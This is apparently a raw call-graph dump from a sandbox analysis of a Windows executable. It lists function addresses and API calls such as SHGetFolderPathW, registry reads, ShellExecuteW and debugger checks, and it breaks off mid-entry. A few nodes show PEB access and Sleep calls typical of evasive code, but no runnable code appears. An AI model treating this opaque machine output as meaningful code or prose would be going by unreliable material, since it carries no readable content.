86265->86270 86271 472324 86265->86271 86272 4724a1 86265->86272 86273 4723ae 86265->86273 86274 4725ad SHGetFolderPathW 86265->86274 86275 47252b SHGetFolderPathW 86265->86275 86276 472369 86265->86276 86277 4724f7 SHGetFolderPathW 86265->86277 86278 472255 86265->86278 86279 472274 86265->86279 86280 4723f3 86265->86280 86281 472593 SHGetFolderPathW 86265->86281 86282 472511 SHGetFolderPathW 86265->86282 86283 4722df 86265->86283 86284 47255f SHGetFolderPathW 86265->86284 86285 47229e GetLocalTime 86265->86285 86286 47247d 86265->86286 86287 4724dd SHGetFolderPathW 86265->86287 86288 472579 SHGetFolderPathW 86265->86288 86289 472438 86265->86289 86360 401b10 86266->86360 86268->86247 86296 4722be 86270->86296 86389 441e23 GetSystemTimeAsFileTime 86271->86389 86406 441e23 GetSystemTimeAsFileTime 86272->86406 86395 441e23 GetSystemTimeAsFileTime 86273->86395 86274->86296 86275->86296 86392 441e23 GetSystemTimeAsFileTime 86276->86392 86277->86296 86315 408f40 VariantClear 86278->86315 86318 408e80 VariantClear 86279->86318 86398 441e23 GetSystemTimeAsFileTime 86280->86398 86281->86296 86282->86296 86386 441e23 GetSystemTimeAsFileTime 86283->86386 86284->86296 86298 4722b9 86285->86298 86404 441e23 GetSystemTimeAsFileTime 86286->86404 86287->86296 86288->86296 86401 441e23 GetSystemTimeAsFileTime 86289->86401 86385 40e710 53 API calls 86296->86385 86384 41329b 79 API calls 3 library calls 86298->86384 86299 40bd50 52 API calls 86309 47217d 86299->86309 86301 4722f7 86387 451aa8 91 API calls _strftime 86301->86387 86302 4723c6 86396 451aa8 91 API calls _strftime 86302->86396 86303 472489 86405 451b19 83 API calls 86303->86405 86304 4724b3 86407 451aa8 91 API calls _strftime 86304->86407 86305 47233c 86390 451aa8 91 API calls _strftime 86305->86390 86306 47240b 86399 451aa8 91 API calls _strftime 86306->86399 86307 472381 86393 451aa8 91 API calls _strftime 86307->86393 86366 40c2c0 86309->86366 86310 472450 86402 451aa8 91 API calls _strftime 86310->86402 86315->86268 86328 47228b 86318->86328 86323 4722fd 86388 40e6a0 53 API calls 86323->86388 86324 4723cc 86397 40e6a0 53 API calls 86324->86397 86325 4724b9 86408 40e6a0 53 API calls 86325->86408 86326 472342 86391 40e6a0 53 API calls 86326->86391 86327 472411 86400 40e6a0 53 API calls 86327->86400 86328->86247 86329 472387 86394 40e6a0 53 API calls 86329->86394 86330 47218c 86339 472193 86330->86339 86341 408e80 VariantClear 86330->86341 86331 472456 86403 40e6a0 53 API calls 86331->86403 86332 4722cc 86332->86247 86339->86247 86349 4721b6 86341->86349 86342 472306 86342->86247 86343 4723d5 86343->86247 86344 4724c2 86344->86247 86345 47234b 86345->86247 86346 47241a 86346->86247 86347 472390 86347->86247 86348 47245f 86348->86247 86349->86247 86350->86249 86351->86251 86353 408e88 86352->86353 86355 408e94 86352->86355 86356 408f40 86353->86356 86355->86245 86359 408f48 moneypunct 86356->86359 86357 4265c7 VariantClear 86358 408f55 moneypunct 86357->86358 86358->86355 86359->86357 86359->86358 86361 401b16 _wcslen 86360->86361 86362 4115d7 52 API calls 86361->86362 86365 401b63 86361->86365 86363 401b4b _memmove 86362->86363 86364 4115d7 52 API calls 86363->86364 86364->86365 86365->86299 86367 40c2c7 86366->86367 86368 40c30e 86366->86368 86369 40c2d3 86367->86369 86370 426c79 86367->86370 86371 40c315 86368->86371 86372 426c2b 86368->86372 86409 403ea0 52 API calls __cinit 86369->86409 86414 4534e3 52 API calls 86370->86414 86376 40c321 86371->86376 86377 426c5a 86371->86377 86374 426c4b 86372->86374 86375 426c2e 86372->86375 86412 4534e3 52 API calls 86374->86412 86383 40c2de 86375->86383 86411 4534e3 52 API calls 86375->86411 86410 403ea0 52 API calls __cinit 86376->86410 86413 4534e3 52 API calls 86377->86413 86383->86330 86383->86383 86384->86296 86385->86332 86386->86301 86387->86323 86388->86342 86389->86305 86390->86326 86391->86345 86392->86307 86393->86329 86394->86347 86395->86302 86396->86324 86397->86343 86398->86306 86399->86327 86400->86346 86401->86310 86402->86331 86403->86348 86404->86303 86405->86298 86406->86304 86407->86325 86408->86344 86409->86383 86410->86383 86411->86383 86412->86377 86413->86383 86414->86383 86415 425ba2 86420 40e360 86415->86420 86417 425bb4 86436 41130a 51 API calls __cinit 86417->86436 86419 425bbe 86421 4115d7 52 API calls 86420->86421 86422 40e3ec GetModuleFileNameW 86421->86422 86437 413a0e 86422->86437 86424 40e421 _wcsncat 86440 413a9e 86424->86440 86427 4115d7 52 API calls 86428 40e45e _wcscpy 86427->86428 86443 40bc70 86428->86443 86432 40e4a9 86432->86417 86433 401c90 52 API calls 86435 40e4a1 _wcscat _wcslen _wcsncpy 86433->86435 86434 4115d7 52 API calls 86434->86435 86435->86432 86435->86433 86435->86434 86436->86419 86462 413801 86437->86462 86492 419efd 86440->86492 86444 4115d7 52 API calls 86443->86444 86445 40bc98 86444->86445 86446 4115d7 52 API calls 86445->86446 86447 40bca6 86446->86447 86448 40e4c0 86447->86448 86504 403350 86448->86504 86450 40e4cb RegOpenKeyExW 86451 427190 RegQueryValueExW 86450->86451 86452 40e4eb 86450->86452 86453 4271b0 86451->86453 86454 42721a RegCloseKey 86451->86454 86452->86435 86455 4115d7 52 API calls 86453->86455 86454->86435 86456 4271cb 86455->86456 86511 43652f 52 API calls 86456->86511 86458 4271d8 RegQueryValueExW 86459 4271f7 86458->86459 86461 42720e 86458->86461 86460 402160 52 API calls 86459->86460 86460->86461 86461->86454 86463 41381a 86462->86463 86464 41389e 86462->86464 86463->86464 86475 41388a 86463->86475 86484 419e30 46 API calls __cftoa_l 86463->86484 86465 4139e8 86464->86465 86466 413a00 86464->86466 86489 417f77 46 API calls __getptd_noexit 86465->86489 86491 417f77 46 API calls __getptd_noexit 86466->86491 86469 4139ed 86490 417f25 10 API calls __cftoa_l 86469->86490 86472 41396c 86472->86464 86473 413967 86472->86473 86476 41397a 86472->86476 86473->86424 86474 413929 86474->86464 86477 413945 86474->86477 86486 419e30 46 API calls __cftoa_l 86474->86486 86475->86464 86483 413909 86475->86483 86485 419e30 46 API calls __cftoa_l 86475->86485 86488 419e30 46 API calls __cftoa_l 86476->86488 86477->86464 86477->86473 86479 41395b 86477->86479 86487 419e30 46 API calls __cftoa_l 86479->86487 86483->86472 86483->86474 86484->86475 86485->86483 86486->86477 86487->86473 86488->86473 86489->86469 86490->86473 86491->86473 86493 419f13 86492->86493 86494 419f0e 86492->86494 86501 417f77 46 API calls __getptd_noexit 86493->86501 86494->86493 86499 419f2b 86494->86499 86496 419f18 86502 417f25 10 API calls __cftoa_l 86496->86502 86500 40e454 86499->86500 86503 417f77 46 API calls __getptd_noexit 86499->86503 86500->86427 86501->86496 86502->86500 86503->86496 86505 403367 86504->86505 86506 403358 86504->86506 86507 4115d7 52 API calls 86505->86507 86506->86450 86508 403370 86507->86508 86509 4115d7 52 API calls 86508->86509 86510 40339e 86509->86510 86510->86450 86511->86458 86512 3fcc4a8 86526 3fca0f8 86512->86526 86514 3fcc591 86529 3fcc398 86514->86529 86532 3fcd5b8 GetPEB 86526->86532 86528 3fca783 86528->86514 86530 3fcc3a1 Sleep 86529->86530 86531 3fcc3af 86530->86531 86533 3fcd5e2 86532->86533 86533->86528 86534 416454 86571 416c70 86534->86571 86536 416460 GetStartupInfoW 86537 416474 86536->86537 86572 419d5a HeapCreate 86537->86572 86539 4164cd 86540 4164d8 86539->86540 86656 41642b 46 API calls 3 library calls 86539->86656 86573 417c20 GetModuleHandleW 86540->86573 86543 4164de 86544 4164e9 __RTC_Initialize 86543->86544 86657 41642b 46 API calls 3 library calls 86543->86657 86592 41aaa1 GetStartupInfoW 86544->86592 86548 416503 GetCommandLineW 86605 41f584 GetEnvironmentStringsW 86548->86605 86552 416513 86611 41f4d6 GetModuleFileNameW 86552->86611 86554 41651d 86555 416528 86554->86555 86659 411924 46 API calls 3 library calls 86554->86659 86615 41f2a4 86555->86615 86558 41652e 86559 416539 86558->86559 86660 411924 46 API calls 3 library calls 86558->86660 86629 411703 86559->86629 86562 416541 86563 41654c __wwincmdln 86562->86563 86661 411924 46 API calls 3 library calls 86562->86661 86633 40d6b0 86563->86633 86567 41657c 86663 411906 46 API calls _doexit 86567->86663 86570 416581 __tzset_nolock 86571->86536 86572->86539 86574 417c34 86573->86574 86575 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86573->86575 86664 4178ff 49 API calls _free 86574->86664 86576 417c87 TlsAlloc 86575->86576 86580 417cd5 TlsSetValue 86576->86580 86581 417d96 86576->86581 86578 417c39 86578->86543 86580->86581 86582 417ce6 __init_pointers 86580->86582 86581->86543 86665 418151 InitializeCriticalSectionAndSpinCount 86582->86665 86584 417d91 86673 4178ff 49 API calls _free 86584->86673 86586 417d2a 86586->86584 86666 416b49 86586->86666 86589 417d76 86672 41793c 46 API calls 4 library calls 86589->86672 86591 417d7e GetCurrentThreadId 86591->86581 86593 416b49 __calloc_crt 46 API calls 86592->86593 86604 41aabf 86593->86604 86594 41ac34 86595 41ac6a GetStdHandle 86594->86595 86598 41acce SetHandleCount 86594->86598 86599 41ac7c GetFileType 86594->86599 86602 41aca2 InitializeCriticalSectionAndSpinCount 86594->86602 86595->86594 86596 41abb4 86596->86594 86600 41abe0 GetFileType 86596->86600 86601 41abeb InitializeCriticalSectionAndSpinCount 86596->86601 86597 416b49 __calloc_crt 46 API calls 86597->86604 86603 4164f7 86598->86603 86599->86594 86600->86596 86600->86601 86601->86596 86601->86603 86602->86594 86602->86603 86603->86548 86658 411924 46 API calls 3 library calls 86603->86658 86604->86594 86604->86596 86604->86597 86604->86603 86604->86604 86606 41f595 86605->86606 86607 41f599 86605->86607 86606->86552 86683 416b04 86607->86683 86609 41f5bb _memmove 86610 41f5c2 FreeEnvironmentStringsW 86609->86610 86610->86552 86612 41f50b _wparse_cmdline 86611->86612 86613 416b04 __malloc_crt 46 API calls 86612->86613 86614 41f54e _wparse_cmdline 86612->86614 86613->86614 86614->86554 86616 41f2bc _wcslen 86615->86616 86620 41f2b4 86615->86620 86617 416b49 __calloc_crt 46 API calls 86616->86617 86622 41f2e0 _wcslen 86617->86622 86618 41f336 86690 413748 86618->86690 86620->86558 86621 416b49 __calloc_crt 46 API calls 86621->86622 86622->86618 86622->86620 86622->86621 86623 41f35c 86622->86623 86626 41f373 86622->86626 86689 41ef12 46 API calls __cftoa_l 86622->86689 86625 413748 _free 46 API calls 86623->86625 86625->86620 86696 417ed3 86626->86696 86628 41f37f 86628->86558 86630 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86629->86630 86632 411750 __IsNonwritableInCurrentImage 86630->86632 86715 41130a 51 API calls __cinit 86630->86715 86632->86562 86634 42e2f3 86633->86634 86635 40d6cc 86633->86635 86636 408f40 VariantClear 86635->86636 86637 40d707 86636->86637 86716 40ebb0 86637->86716 86640 40d737 86719 411951 86640->86719 86645 40d751 86731 40f4e0 SystemParametersInfoW SystemParametersInfoW 86645->86731 86647 40d75f 86732 40d590 GetCurrentDirectoryW 86647->86732 86649 40d767 SystemParametersInfoW 86650 40d794 86649->86650 86651 40d78d FreeLibrary 86649->86651 86652 408f40 VariantClear 86650->86652 86651->86650 86653 40d79d 86652->86653 86654 408f40 VariantClear 86653->86654 86655 40d7a6 86654->86655 86655->86567 86662 4118da 46 API calls _doexit 86655->86662 86656->86540 86657->86544 86662->86567 86663->86570 86664->86578 86665->86586 86668 416b52 86666->86668 86669 416b8f 86668->86669 86670 416b70 Sleep 86668->86670 86674 41f677 86668->86674 86669->86584 86669->86589 86671 416b85 86670->86671 86671->86668 86671->86669 86672->86591 86673->86581 86675 41f683 86674->86675 86681 41f69e _malloc 86674->86681 86676 41f68f 86675->86676 86675->86681 86682 417f77 46 API calls __getptd_noexit 86676->86682 86678 41f6b1 HeapAlloc 86680 41f6d8 86678->86680 86678->86681 86679 41f694 86679->86668 86680->86668 86681->86678 86681->86680 86682->86679 86686 416b0d 86683->86686 86684 4135bb _malloc 45 API calls 86684->86686 86685 416b43 86685->86609 86686->86684 86686->86685 86687 416b24 Sleep 86686->86687 86688 416b39 86687->86688 86688->86685 86688->86686 86689->86622 86691 413753 RtlFreeHeap 86690->86691 86695 41377c _free 86690->86695 86692 413768 86691->86692 86691->86695 86699 417f77 46 API calls __getptd_noexit 86692->86699 86694 41376e GetLastError 86694->86695 86695->86620 86700 417daa 86696->86700 86699->86694 86701 417dc9 __cftoa_l __call_reportfault 86700->86701 86702 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86701->86702 86703 417eb5 __call_reportfault 86702->86703 86706 41a208 86703->86706 86705 417ed1 GetCurrentProcess TerminateProcess 86705->86628 86707 41a210 86706->86707 86708 41a212 IsDebuggerPresent 86706->86708 86707->86705 86714 41fe19 86708->86714 86711 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86712 421ff8 GetCurrentProcess TerminateProcess 86711->86712 86713 421ff0 __call_reportfault 86711->86713 86712->86705 86713->86712 86714->86711 86715->86632 86772 40ebd0 86716->86772 86776 4182cb 86719->86776 86721 41195e 86783 4181f2 LeaveCriticalSection 86721->86783 86723 40d748 86724 4119b0 86723->86724 86725 4119d6 86724->86725 86726 4119bc 86724->86726 86725->86645 86726->86725 86818 417f77 46 API calls __getptd_noexit 86726->86818 86728 4119c6 86819 417f25 10 API calls __cftoa_l 86728->86819 86730 4119d1 86730->86645 86731->86647 86820 401f20 86732->86820 86734 40d5b6 IsDebuggerPresent 86735 40d5c4 86734->86735 86736 42e1bb MessageBoxA 86734->86736 86737 42e1d4 86735->86737 86738 40d5e3 86735->86738 86736->86737 86993 403a50 52 API calls 3 library calls 86737->86993 86890 40f520 86738->86890 86742 40d5fd GetFullPathNameW 86902 401460 86742->86902 86744 40d63b 86745 40d643 86744->86745 86747 42e231 SetCurrentDirectoryW 86744->86747 86746 40d64c 86745->86746 86994 432fee 6 API calls 86745->86994 86917 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86746->86917 86747->86745 86750 42e252 86750->86746 86752 42e25a GetModuleFileNameW 86750->86752 86754 42e274 86752->86754 86755 42e2cb GetForegroundWindow ShellExecuteW 86752->86755 86757 401b10 52 API calls 86754->86757 86759 40d688 86755->86759 86756 40d656 86758 40d669 86756->86758 86991 40e0c0 74 API calls __cftoa_l 86756->86991 86760 42e281 86757->86760 86925 4091e0 86758->86925 86763 40d692 SetCurrentDirectoryW 86759->86763 86995 40d200 52 API calls 2 library calls 86760->86995 86763->86649 86766 42e28d 86996 40d200 52 API calls 2 library calls 86766->86996 86769 42e299 GetForegroundWindow ShellExecuteW 86770 42e2c6 86769->86770 86770->86759 86771 40ec00 LoadLibraryA GetProcAddress 86771->86640 86773 40d72e 86772->86773 86774 40ebd6 LoadLibraryA 86772->86774 86773->86640 86773->86771 86774->86773 86775 40ebe7 GetProcAddress 86774->86775 86775->86773 86777 4182e0 86776->86777 86778 4182f3 EnterCriticalSection 86776->86778 86784 418209 86777->86784 86778->86721 86780 4182e6 86780->86778 86811 411924 46 API calls 3 library calls 86780->86811 86783->86723 86785 418215 __tzset_nolock 86784->86785 86786 418225 86785->86786 86787 41823d 86785->86787 86812 418901 46 API calls __NMSG_WRITE 86786->86812 86790 416b04 __malloc_crt 45 API calls 86787->86790 86793 41824b __tzset_nolock 86787->86793 86789 41822a 86813 418752 46 API calls 6 library calls 86789->86813 86792 418256 86790->86792 86795 41825d 86792->86795 86796 41826c 86792->86796 86793->86780 86794 418231 86814 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86794->86814 86815 417f77 46 API calls __getptd_noexit 86795->86815 86797 4182cb __lock 45 API calls 86796->86797 86800 418273 86797->86800 86802 4182a6 86800->86802 86803 41827b InitializeCriticalSectionAndSpinCount 86800->86803 86806 413748 _free 45 API calls 86802->86806 86804 418297 86803->86804 86805 41828b 86803->86805 86817 4182c2 LeaveCriticalSection _doexit 86804->86817 86807 413748 _free 45 API calls 86805->86807 86806->86804 86808 418291 86807->86808 86816 417f77 46 API calls __getptd_noexit 86808->86816 86812->86789 86813->86794 86815->86793 86816->86804 86817->86793 86818->86728 86819->86730 86997 40e6e0 86820->86997 86824 401f41 GetModuleFileNameW 87015 410100 86824->87015 86826 401f5c 87027 410960 86826->87027 86829 401b10 52 API calls 86830 401f81 86829->86830 87030 401980 86830->87030 86832 401f8e 86833 408f40 VariantClear 86832->86833 86834 401f9d 86833->86834 86835 401b10 52 API calls 86834->86835 86836 401fb4 86835->86836 86837 401980 53 API calls 86836->86837 86838 401fc3 86837->86838 86839 401b10 52 API calls 86838->86839 86840 401fd2 86839->86840 86841 40c2c0 52 API calls 86840->86841 86842 401fe1 86841->86842 86843 40bc70 52 API calls 86842->86843 86844 401ff3 86843->86844 87038 401a10 86844->87038 86846 401ffe 87045 4114ab 86846->87045 86849 428b05 86851 401a10 52 API calls 86849->86851 86850 402017 86852 4114ab __wcsicoll 58 API calls 86850->86852 86853 428b18 86851->86853 86854 402022 86852->86854 86856 401a10 52 API calls 86853->86856 86854->86853 86855 40202d 86854->86855 86857 4114ab __wcsicoll 58 API calls 86855->86857 86858 428b33 86856->86858 86859 402038 86857->86859 86861 428b3b GetModuleFileNameW 86858->86861 86860 402043 86859->86860 86859->86861 86862 4114ab __wcsicoll 58 API calls 86860->86862 86863 401a10 52 API calls 86861->86863 86864 40204e 86862->86864 86865 428b6c 86863->86865 86866 402092 86864->86866 86871 401a10 52 API calls 86864->86871 86874 428b90 _wcscpy 86864->86874 86867 40e0a0 52 API calls 86865->86867 86868 4020a3 86866->86868 86866->86874 86869 428b7a 86867->86869 86870 428bc6 86868->86870 87053 40e830 53 API calls 86868->87053 86872 401a10 52 API calls 86869->86872 86876 402073 _wcscpy 86871->86876 86873 428b88 86872->86873 86873->86874 86877 401a10 52 API calls 86874->86877 86880 401a10 52 API calls 86876->86880 86885 4020d0 86877->86885 86878 4020bb 87054 40cf00 53 API calls 86878->87054 86880->86866 86881 4020c6 86882 408f40 VariantClear 86881->86882 86882->86885 86883 402110 86887 408f40 VariantClear 86883->86887 86885->86883 86888 401a10 52 API calls 86885->86888 87055 40cf00 53 API calls 86885->87055 87056 40e6a0 53 API calls 86885->87056 86889 402120 moneypunct 86887->86889 86888->86885 86889->86734 86891 40f53c 86890->86891 86892 4295c9 __cftoa_l 86890->86892 87729 410120 86891->87729 86894 4295d9 GetOpenFileNameW 86892->86894 86894->86891 86896 40d5f5 86894->86896 86895 40f545 87733 4102b0 SHGetMalloc 86895->87733 86896->86742 86896->86744 86898 40f54c 87738 410190 GetFullPathNameW 86898->87738 86900 40f559 87749 40f570 86900->87749 87799 402400 86902->87799 86904 40146f 86907 428c29 _wcscat 86904->86907 87808 401500 86904->87808 86906 40147c 86906->86907 87816 40d440 86906->87816 86909 401489 86909->86907 86910 401491 GetFullPathNameW 86909->86910 86911 402160 52 API calls 86910->86911 86912 4014bb 86911->86912 86913 402160 52 API calls 86912->86913 86914 4014c8 86913->86914 86914->86907 86915 402160 52 API calls 86914->86915 86916 4014ee 86915->86916 86916->86744 86918 428361 86917->86918 86919 4103fc LoadImageW RegisterClassExW 86917->86919 87892 44395e EnumResourceNamesW LoadImageW 86918->87892 87891 410490 7 API calls 86919->87891 86922 40d651 86924 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86922->86924 86923 428368 86924->86756 86926 409202 86925->86926 86927 42d7ad 86925->86927 86970 409216 moneypunct 86926->86970 88164 410940 338 API calls 86926->88164 88167 45e737 90 API calls 3 library calls 86927->88167 86930 409386 86931 40939c 86930->86931 88165 40f190 10 API calls 86930->88165 86931->86759 86992 401000 Shell_NotifyIconW __cftoa_l 86931->86992 86933 4095b2 86933->86931 86935 4095bf 86933->86935 86934 409253 PeekMessageW 86934->86970 88166 401a50 338 API calls 86935->88166 86937 42d8cd Sleep 86937->86970 86938 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86938->86931 86941 4095f9 86938->86941 86940 42e13b 88185 40d410 VariantClear 86940->88185 86944 42e158 TranslateMessage DispatchMessageW GetMessageW 86941->86944 86944->86944 86946 42e188 86944->86946 86945 409567 PeekMessageW 86945->86970 86946->86931 86949 40e0a0 52 API calls 86949->86970 86950 46fdbf 108 API calls 86967 4094e0 86950->86967 86951 46f3c1 107 API calls 86951->86970 86952 409551 TranslateMessage DispatchMessageW 86952->86945 86954 42dcd2 WaitForSingleObject 86957 42dcf0 GetExitCodeProcess CloseHandle 86954->86957 86954->86970 86955 44c29d 52 API calls 86955->86967 86956 42dd3d Sleep 86956->86967 88174 40d410 VariantClear 86957->88174 86961 4094cf Sleep 86961->86967 86962 40c620 timeGetTime 86962->86967 86963 42d94d timeGetTime 88170 465124 53 API calls 86963->88170 86965 40d410 VariantClear 86965->86970 86967->86950 86967->86955 86967->86962 86969 465124 53 API calls 86967->86969 86967->86970 86972 42dd89 CloseHandle 86967->86972 86975 408f40 VariantClear 86967->86975 86976 42de19 GetExitCodeProcess CloseHandle 86967->86976 86979 42de88 Sleep 86967->86979 86987 401b10 52 API calls 86967->86987 86989 401980 53 API calls 86967->86989 88171 45178a 54 API calls 86967->88171 88172 47d33e 338 API calls 86967->88172 88173 453bc6 54 API calls 86967->88173 88175 40d410 VariantClear 86967->88175 88176 443d19 67 API calls _wcslen 86967->88176 88177 4574b4 VariantClear 86967->88177 88178 403cd0 86967->88178 88182 4731e1 VariantClear 86967->88182 88183 4331a2 6 API calls 86967->88183 86969->86967 86970->86930 86970->86934 86970->86937 86970->86940 86970->86945 86970->86949 86970->86951 86970->86952 86970->86954 86970->86956 86970->86961 86970->86963 86970->86965 86970->86967 86973 47d33e 316 API calls 86970->86973 86982 45e737 90 API calls 86970->86982 86985 42e0cc VariantClear 86970->86985 86986 408f40 VariantClear 86970->86986 87893 4091b0 86970->87893 87951 40afa0 86970->87951 87977 4096a0 86970->87977 88104 408fc0 86970->88104 88139 408cc0 86970->88139 88153 40d150 86970->88153 88158 40d170 86970->88158 88168 465124 53 API calls 86970->88168 88169 40c620 timeGetTime 86970->88169 88184 40e270 VariantClear moneypunct 86970->88184 86972->86967 86973->86970 86975->86967 86976->86967 86979->86970 86982->86970 86985->86970 86986->86970 86987->86967 86989->86967 86991->86758 86992->86759 86993->86744 86994->86750 86995->86766 86996->86769 86998 40bc70 52 API calls 86997->86998 86999 401f31 86998->86999 87000 402560 86999->87000 87001 40256d __write_nolock 87000->87001 87002 402160 52 API calls 87001->87002 87004 402593 87002->87004 87008 4025bd 87004->87008 87057 401c90 87004->87057 87005 4026f0 52 API calls 87005->87008 87006 4026db 87006->86824 87007 4026a7 87007->87006 87009 401b10 52 API calls 87007->87009 87008->87005 87008->87007 87010 401b10 52 API calls 87008->87010 87014 401c90 52 API calls 87008->87014 87060 40d7c0 52 API calls 2 library calls 87008->87060 87011 4026d1 87009->87011 87010->87008 87061 40d7c0 52 API calls 2 library calls 87011->87061 87014->87008 87062 40f760 87015->87062 87018 410118 87018->86826 87020 42805d 87023 42806a 87020->87023 87118 431e58 87020->87118 87022 413748 _free 46 API calls 87024 428078 87022->87024 87023->87022 87025 431e58 82 API calls 87024->87025 87026 428084 87025->87026 87026->86826 87028 4115d7 52 API calls 87027->87028 87029 401f74 87028->87029 87029->86829 87031 4019a3 87030->87031 87036 401985 87030->87036 87032 4019b8 87031->87032 87031->87036 87724 403e10 53 API calls 87032->87724 87034 40199f 87034->86832 87035 4019c4 87035->86832 87036->87034 87723 403e10 53 API calls 87036->87723 87039 401a30 87038->87039 87040 401a17 87038->87040 87042 402160 52 API calls 87039->87042 87041 401a2d 87040->87041 87725 403c30 52 API calls _memmove 87040->87725 87041->86846 87044 401a3d 87042->87044 87044->86846 87046 411523 87045->87046 87047 4114ba 87045->87047 87728 4113a8 58 API calls 3 library calls 87046->87728 87052 40200c 87047->87052 87726 417f77 46 API calls __getptd_noexit 87047->87726 87050 4114c6 87727 417f25 10 API calls __cftoa_l 87050->87727 87052->86849 87052->86850 87053->86878 87054->86881 87055->86885 87056->86885 87058 4026f0 52 API calls 87057->87058 87059 401c97 87058->87059 87059->87004 87060->87008 87061->87006 87122 40f6f0 87062->87122 87064 40f77b _strcat moneypunct 87130 40f850 87064->87130 87069 427c2a 87159 414d04 87069->87159 87071 40f7fc 87071->87069 87072 40f804 87071->87072 87146 414a46 87072->87146 87076 40f80e 87076->87018 87081 4528bd 87076->87081 87078 427c59 87165 414fe2 87078->87165 87080 427c79 87082 4150d1 _fseek 81 API calls 87081->87082 87083 452930 87082->87083 87665 452719 87083->87665 87086 452948 87086->87020 87087 414d04 __fread_nolock 61 API calls 87088 452966 87087->87088 87089 414d04 __fread_nolock 61 API calls 87088->87089 87090 452976 87089->87090 87091 414d04 __fread_nolock 61 API calls 87090->87091 87092 45298f 87091->87092 87093 414d04 __fread_nolock 61 API calls 87092->87093 87094 4529aa 87093->87094 87095 4150d1 _fseek 81 API calls 87094->87095 87096 4529c4 87095->87096 87097 4135bb _malloc 46 API calls 87096->87097 87098 4529cf 87097->87098 87099 4135bb _malloc 46 API calls 87098->87099 87100 4529db 87099->87100 87101 414d04 __fread_nolock 61 API calls 87100->87101 87102 4529ec 87101->87102 87103 44afef GetSystemTimeAsFileTime 87102->87103 87104 452a00 87103->87104 87105 452a36 87104->87105 87106 452a13 87104->87106 87108 452aa5 87105->87108 87109 452a3c 87105->87109 87107 413748 _free 46 API calls 87106->87107 87111 452a1c 87107->87111 87110 413748 _free 46 API calls 87108->87110 87671 44b1a9 87109->87671 87113 452aa3 87110->87113 87114 413748 _free 46 API calls 87111->87114 87113->87020 87116 452a25 87114->87116 87115 452a9d 87117 413748 _free 46 API calls 87115->87117 87116->87020 87117->87113 87119 431e64 87118->87119 87121 431e6a 87118->87121 87120 414a46 __fcloseall 82 API calls 87119->87120 87120->87121 87121->87023 87123 425de2 87122->87123 87124 40f6fc _wcslen 87122->87124 87123->87064 87125 40f710 WideCharToMultiByte 87124->87125 87126 40f756 87125->87126 87127 40f728 87125->87127 87126->87064 87128 4115d7 52 API calls 87127->87128 87129 40f735 WideCharToMultiByte 87128->87129 87129->87064 87131 40f85d __cftoa_l _strlen 87130->87131 87133 40f7ab 87131->87133 87178 414db8 87131->87178 87134 4149c2 87133->87134 87193 414904 87134->87193 87136 40f7e9 87136->87069 87137 40f5c0 87136->87137 87138 40f5cd _strcat __write_nolock _memmove 87137->87138 87139 414d04 __fread_nolock 61 API calls 87138->87139 87140 40f691 __tzset_nolock 87138->87140 87142 425d11 87138->87142 87281 4150d1 87138->87281 87139->87138 87140->87071 87143 4150d1 _fseek 81 API calls 87142->87143 87144 425d33 87143->87144 87145 414d04 __fread_nolock 61 API calls 87144->87145 87145->87140 87147 414a52 __tzset_nolock 87146->87147 87148 414a64 87147->87148 87150 414a79 87147->87150 87421 417f77 46 API calls __getptd_noexit 87148->87421 87151 415471 __lock_file 47 API calls 87150->87151 87155 414a74 __tzset_nolock 87150->87155 87153 414a92 87151->87153 87152 414a69 87422 417f25 10 API calls __cftoa_l 87152->87422 87405 4149d9 87153->87405 87155->87076 87490 414c76 87159->87490 87161 414d1c 87162 44afef 87161->87162 87658 442c5a 87162->87658 87164 44b00d 87164->87078 87166 414fee __tzset_nolock 87165->87166 87167 414ffa 87166->87167 87168 41500f 87166->87168 87662 417f77 46 API calls __getptd_noexit 87167->87662 87170 415471 __lock_file 47 API calls 87168->87170 87172 415017 87170->87172 87171 414fff 87663 417f25 10 API calls __cftoa_l 87171->87663 87174 414e4e __ftell_nolock 51 API calls 87172->87174 87175 415024 87174->87175 87664 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87175->87664 87176 41500a __tzset_nolock 87176->87080 87179 414dd6 87178->87179 87180 414deb 87178->87180 87189 417f77 46 API calls __getptd_noexit 87179->87189 87180->87179 87181 414df2 87180->87181 87191 41b91b 79 API calls 12 library calls 87181->87191 87183 414ddb 87190 417f25 10 API calls __cftoa_l 87183->87190 87186 414de6 87186->87131 87187 414e18 87187->87186 87192 418f98 77 API calls 6 library calls 87187->87192 87189->87183 87190->87186 87191->87187 87192->87186 87196 414910 __tzset_nolock 87193->87196 87194 414923 87249 417f77 46 API calls __getptd_noexit 87194->87249 87196->87194 87198 414951 87196->87198 87197 414928 87250 417f25 10 API calls __cftoa_l 87197->87250 87212 41d4d1 87198->87212 87201 414956 87202 41496a 87201->87202 87203 41495d 87201->87203 87205 414992 87202->87205 87206 414972 87202->87206 87251 417f77 46 API calls __getptd_noexit 87203->87251 87229 41d218 87205->87229 87252 417f77 46 API calls __getptd_noexit 87206->87252 87209 414933 __tzset_nolock @_EH4_CallFilterFunc@8 87209->87136 87213 41d4dd __tzset_nolock 87212->87213 87214 4182cb __lock 46 API calls 87213->87214 87226 41d4eb 87214->87226 87215 41d560 87254 41d5fb 87215->87254 87216 41d567 87218 416b04 __malloc_crt 46 API calls 87216->87218 87220 41d56e 87218->87220 87219 41d5f0 __tzset_nolock 87219->87201 87220->87215 87221 41d57c InitializeCriticalSectionAndSpinCount 87220->87221 87223 41d59c 87221->87223 87224 41d5af EnterCriticalSection 87221->87224 87227 413748 _free 46 API calls 87223->87227 87224->87215 87225 418209 __mtinitlocknum 46 API calls 87225->87226 87226->87215 87226->87216 87226->87225 87257 4154b2 47 API calls __lock 87226->87257 87258 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87226->87258 87227->87215 87230 41d23a 87229->87230 87231 41d255 87230->87231 87242 41d26c __wopenfile 87230->87242 87263 417f77 46 API calls __getptd_noexit 87231->87263 87233 41d25a 87264 417f25 10 API calls __cftoa_l 87233->87264 87235 41d47a 87268 417f77 46 API calls __getptd_noexit 87235->87268 87236 41d48c 87260 